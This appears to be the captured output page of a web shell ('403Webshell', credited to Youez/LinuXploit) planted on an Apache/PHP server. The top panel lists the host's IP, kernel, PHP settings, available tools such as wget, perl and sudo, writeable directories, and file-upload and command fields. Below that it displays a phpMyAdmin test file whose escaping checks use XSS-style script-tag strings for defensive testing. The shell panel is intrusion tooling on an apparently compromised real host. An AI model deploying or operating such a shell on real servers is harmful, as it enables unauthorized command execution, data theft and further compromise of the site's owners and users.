403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/phpmyadming/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/phpmyadming/test/escape_js_string.php
<?php
/* $Id: escape_js_string.php 9913 2007-02-03 17:30:07Z lem9 $ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
 * Test for javascript escaping.
 *
 * @author Michal Čihař <michal@cihar.com>
 * @package phpMyAdmin-test
 */

/**
 * Tests core.
 */
include('./core.lib.php');
/**
 * Include to test.
 */
include('./libraries/js_escape.lib.php');

/**
 * Test java script escaping.
 *
 * @uses    PMA_escapeJsString()
 * @uses    PMA_test_string()
 * @param string string to escape
 * @param string expected result
 */
function PMA_test_escape($test, $expected) {
    PMA_test_string('PMA_escapeJsString', $test, PMA_escapeJsString($test), $expected);
}

PMA_test_escape('\';', '\\\';');
PMA_test_escape("\r\n'<scrIpt></sCRIPT>", '\r\n\\\'<scrIpt></\' + \'script>');
PMA_test_escape('\';[XSS]', '\\\';[XSS]');
PMA_test_escape('</SCRIPT></head><body>[HTML]', '</\' + \'script></head><body>[HTML]');
PMA_test_escape('"\'\\\'"', '"\\\'\\\\\\\'"');
PMA_test_escape("\\''''''''''''\\", "\\\\\'\'\'\'\'\'\'\'\'\'\'\'\\\\");
?>

Youez - 2016 - github.com/yon3zu
LinuXploit